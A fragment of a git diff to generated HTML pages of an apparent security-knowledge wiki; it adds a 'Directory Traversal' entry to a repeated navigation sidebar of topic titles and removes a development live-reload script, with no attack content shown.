        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -198,22 +198,6 @@

- - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html index d243546d..08d3f484 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Weak Registry Permissions.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -187,22 +187,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html index 6a5686ea..eb6b4329 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -193,22 +193,6 @@

Enumeration

